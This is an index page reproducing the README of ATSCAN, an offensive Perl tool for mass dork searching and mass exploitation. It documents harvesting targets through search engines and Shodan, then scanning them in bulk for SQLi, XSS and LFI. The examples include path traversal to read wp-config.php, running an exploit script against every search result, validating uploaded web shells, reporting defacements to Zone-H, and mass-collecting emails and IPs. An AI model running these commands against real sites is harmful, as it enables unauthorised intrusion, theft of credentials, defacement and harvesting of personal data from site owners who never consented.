Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/alisamtechnology/atscan

Advanced dork Search & Mass Exploit Scanner
https://github.com/alisamtechnology/atscan

data dork engine exploitation lfi linux mass-exploitation-scanner ports portscan rfi scanner security server shell sqli system tools vulnerability-scanners web-application xss

Last synced: 22 days ago
JSON representation

Advanced dork Search & Mass Exploit Scanner

Awesome Lists containing this project

README

        

ATSCAN SCANNER




















Advanced Mass Search / Dork / Exploitation Scanner



Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent! It is your responsibility to obey laws!


Codename:4n0n4t


AUTHOR:Ali MEHDIOUI


GROUP:Alisam@Technology


Description:



● Engines: [Google apis cache] Bing Ask Yandex Sogou Exalead Shodan

● Mass Dork Search

● Multiple instant scans.

● Mass Exploitation

● Use proxy.

● Random user agent.

● Random engine.

● Mass Extern commands execution.

● Exploits and issues search.

● XSS / SQLI / LFI / AFD scanner.

● Filter wordpress & Joomla sites.

● Wordpress theme and plugin detection.

● Find Admin page.

● Decode / Encode Base64 / MD5



● Ports scan.

● Collect IPs

● Collect E-mails.

● Auto detect errors.

● Auto detect forms.

● Auto detect Cms.

● Post data.

● Auto sequence repeater.

● Validation.

● Post and Get method

● IP Localisation

● Issues and Exploit search

● Interactive and Normal interface.

● And more...



★ Libreries to install:



Perl Required.

Works in all platforms.
Disponible in Blackarch and Dracos Linux.


Download:



● git clone https://github.com/AlisamTechnology/ATSCAN

● direct link: https://github.com/AlisamTechnology/ATSCAN


Permissions:



cd ATSCAN

chmod +x ./atscan.pl


Installation:


chmod +x ./install.sh
./install.sh


Execution:



Portable Execution: perl ./atscan.pl

Installed Tool Execution: atscan

Menu: Applications > Web Application analysis > atscan


Repair Tool:



atscan --repair



Uninstall Tool:



atscan --uninstall



Commands:




--help / -h
Help.


--proxy

Set tor proxy for scans [EX: --proxy "socks4://localhost:9050"]

Set proxy [EX: --proxy "http://12.45.44.2:8080"]

Set proxy list [EX: --proxy file]


--prandom
Random proxy [EX: --prandom file] or --prandom "socks://localhost:9050"]


--motor / -m
bing google ask yandex sogou exalead googleapis googlecache or all


--apikey
Apikey


--cx
Googleapis ID


--mrandom
Random of given engines


--brandom
Random all disponibles agents


--freq
Random time frequency (in seconds)


--time
set browser time out


--dork / -d
Dork to search [Ex: house [OTHER]cars [OTHER]hotel]


--target / -t
Target


--level / -l
Scan level (Number of results pages to scan)


--zone
Search engine country.


--param / -p
Set test parameter EX:id,cat,product_ID


--save / -s
Output.


--source
Html output file


--bugtraq
Serach exploits and issues


--content
Print request content


--data
Post and Get forms. See examples


--vshell
Validate by url ex: --HOST/shell.php or file


--post
Use post method


--get
Use get method


--header
Set headers


--fullHeaders
Print full request headers


--host
Domain name [Ex: site.com]


--nobanner
Hide tool banner


--beep
Produce beep sound if positive scan found.


--ifend
Produce beep sound when scan process is finished.


--noverbose
No scan verbose.


--ping
Host ping.


--limit
Limit max positive scan results.


--valid / -v
Validate by string at least 1 is matching


--validAll
Validate all given strings


--status
Validate by http header status


--server
Validate by server


--ifinurl
Get targets with exact string matching


--sregex
Get targets with exact regex matching


--exclude
Get targets where strings do not exist in html


--excludeAll
Get targets where all strings do not exist in html


--unique
Get targets with exact dork matching


--replace
Replace exact string


--replaceFROM
Replace from string to the end of target


--exp / -e
Exploit/Payload will be added to full target


--expHost
Exploit will be added to the host


--expIp
Exploit will be added to the host ip


--xss
Xss scan



--sql
Sqli scan


--lfi
Local file inclusion


--joomrfi
Scan for joomla local file inclusion.


--shell
Shell link [Ex: http://www.site.com/shell.txt]


--wpafd
Scan wordpress sites for arbitrary file download


--admin
Get site admin page


--shost
Get site subdomains


--port
port


--tcp
TCP port


--udp
UDP port


--getlinks
Get target html links


--wp
Wordpress site


--joom
Joomla site


--zip
Get zip files


--md5
Convert to md5


--encode64
Encode base64 string


--decode64
decode base64 string


--TARGET
Will be replaced by target in extern command


--HOST
Will be replaced by host in extern command


--HOSTIP
Will be replaced by host IP in extern command


--PORT
Will be replaced by open port in extern command


--ips
Collect Ips


--geoloc
Ip geolocalisation


--regex
Crawl to get strings matching regex


--noquery
Remove string value from Query url [ex: site.com/index.php?id=string]


--command / -c
Extern Command to execute


--popup
Execute Extern Command in new terminal window


--zoneH
Upload to Zone-H


--saveCookie
Cookies output file


--setCookies
Cookie file


--email
Collect emails


rang(x-y)
EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql

site.com/index.php?id=1 -> 9.


repeat(txt-y)
EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --status 200 OR -t "site.com/index.php?id=../wp-config.php"

In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times


[OTHER]
To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3


--googleapi
Google Apis


--shodan
Shodan search


--count
Search Shodan without Results


--count
Search Shodan


--dnsreverset
Shodan Reverse DNS Lookup


--dnsresolve
Shodan Resolve DNS Lookup


--tokens
String filters and parameters


--querysearch
Search the directory of saved Shodan search queries


--query
List the saved Shodan search queries


--querytags
List the most popular Shodan tags


--myip
List all services that Shodan crawls


--services
List all services that Shodan crawls


--apinfo
My Shodan API Plan Information


--ports
List of port numbers that the crawlers are looking for


--protocols
List all protocols that can be used when performing on-demand Internet scans via Shodan.


--honeyscore
Calculates honeypot score ranging from 0 (not a honeypot) to 1.0 (is a honeypot) in shodan


--facets
Shodan search facets


--update
Update tool


--repair
Repair or force tool update.


--tool / -?
Tool info.


--config
User configuration.


--interactive / -i
Interactive mode interface.


--uninstall
Uninstall Tool.



Examples:




PROXY:

Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].

Proxy: --proxy [proxy] Ex: --proxy http://12.32.1.5:8080

or --proxy file Ex: --proxy my_proxies.txt



RANDOM:

Random proxy: --prandom [proxy file]

Random browser: --brandom

Random engine: --mrandom [ENGINES]



SET HEADERS:

atscan --dork [dork / dorks.txt] --level [level] --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"

atscan -t target --data "name=>username, email=>xxxxxx, pass=>xxxxx" --post --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"



SEARCH ENGINE:

Search: atscan --dork [dork] --level [level]

Search: atscan -d [dork] -l [level] --getlinks

Set engine: atscan --dork [dork] --level [level] -m bing or google,ask,yandex or all

Set selective engines: atscan -d [dork] -l [level] -m google,bing,..

Search with many dorks: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3] --level [level]

Get Server wordpress sites: atscan -t [target] --wp

Search + output: atscan --dork [dorks.txt] --level [level] --save

Search + get emails: atscan -d [dorks.txt] -l [level] --email

Search + get site emails: atscan --dork site:site.com --level [level] --email

Search + get ips: atscan --dork [dork] --level [level] --ips



REGULAR EXPRESSIONS:

Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex]

IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))

E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'



REPEATER:

atscan -t site.com?index.php?id=rang(1-10) --sql

atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql

atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php"



PORTS

atscan -t [ip] --port [port] [--udp / --tcp]

atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]

atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"



ENCODE / DECODE:

Generate MD5: --md5 [string]

Encode base64: --encode64 [string]

Decode base64: --decode64 [string]



DATA:

Data: atscan -t [target] --data "field1=>value1, field2=>value2, field3=>value3" [--post / --get /]

Exploit: --exp/expHost --data "field1=>value1, field2=>value2, field3=>value3" --vshell [shell path] -v [string] / --status [code] [--post / --get / --upload]

Wordlist: --data "field1=>value1, field2=>WORDLIST:" --vshell [shell path] -v [string] / --status [code] [--post / --get]



EXTERNAL COMMANDS:

atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"

atscan --dork [dork / dorks.txt] --level [level] --command "file"

atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"

atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"

atscan -d "index of /lib/scripts/dl-skin.php" -l 2 -m bing --command "php WP-dl-skin.php-exploit.php --TARGET"

atscan --shodan --search [string] --apikey [API KEY] -command [extern_command]



MULTIPLE SCANS:

atscan --dork [dork> --level [10] --sql --lfi --wp ..

atscan --dork [dork> --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]

atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]

atscan -t [target] [--sql / --lfi / --wp /...]



IP LOCALISATION:

atscan -t [ip/target] --geoloc



SEARCH VALIDATION:

atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]

atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]

atscan -d [dork / dorks.txt] -l [level] --status [code] / --exclude [string/file]

atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]

atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string]

atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]

atscan -d [dork / dorks.txt] -l [level] --unique

atscan -t [target / targets.txt] [--status [code] / --valid [string]

atscan -t [target / targets.txt] --vshell [file path]

atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string]

atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]

atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]

atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]

atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string]

atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string]

atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]

atscan -t [target / targets.txt] --valid [string] --exclude [string]



ZONE-H:

atscan -t [target / targets.txt] -v [string] --zoneH "notifier => --HOST/index.php"



SEARCH EXPLOITS:

atscan --bugtraq -d [string] -l 1 EX: atscan --bugtraq -d wordpress -l 1

atscan --bugtraq -d file.txt -l 1

atscan --bugtraq -d [string] -l 1--limit 10



GOOGLEAPIS SEARCH

atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID]

atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] -v [string]

atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] --exp [exploit]

atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] [ANY APTION]



SHODAN SEARCH

atscan --shodan --targget [ip or host or file] --apikey [API KEY]

atscan --shodan --dork [string or file] --apikey [API KEY]

atscan --shodan --dnsresolve [ip or host or file] --apikey [API KEY]

atscan --shodan --dnsrevese [ip or host or file] --apikey [API KEY]

atscan --shodan --count [query or file] --apikey [API KEY]

atscan --shodan --query --apikey [API KEY]

atscan --shodan --querysearch [query or file] --apikey [API KEY]

atscan --shodan --querytags --apikey [API KEY]

atscan --shodan --myip --apikey [API KEY]

atscan --shodan --apinfo --apikey [API KEY]

atscan --shodan --services --apikey [API KEY]

atscan --shodan --ports --apikey [API KEY]

atscan --shodan --tokens [string or file] --apikey [API KEY]



UPDATE TOOL:

atscan --update



UNINSTALL TOOL:

atscan --uninstall


THANKS TO:

Blackarch linux & Dragos Os developers to incorporate my project in their systems.